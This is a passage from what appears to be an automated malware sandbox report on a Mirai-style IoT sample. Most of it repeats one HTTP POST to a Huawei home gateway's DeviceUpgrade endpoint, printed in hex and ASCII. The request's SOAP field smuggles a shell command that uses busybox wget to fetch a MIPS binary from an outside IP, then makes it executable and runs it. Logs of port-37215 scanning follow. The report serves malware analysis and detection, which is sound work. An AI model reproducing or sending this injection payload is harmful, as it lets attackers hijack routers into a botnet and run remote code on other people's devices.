6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.88.204.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.78.56.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.63.127.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.27.169.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.99.21.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.249.91.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.203.69.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.123.230.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.175.90.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.65.10.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.248.129.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.68.195.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.84.219.122:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.169.75.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.227.70.241:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.224.113.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.52.101.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.132.5.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.221.247.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.229.64.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.138.73.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.161.228.29:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.130.10.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.174.12.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.176.189.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.122.41.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.229.47.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.151.165.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.8.123.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.88.135.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.247.14.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.121.238.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.179.88.134:37215
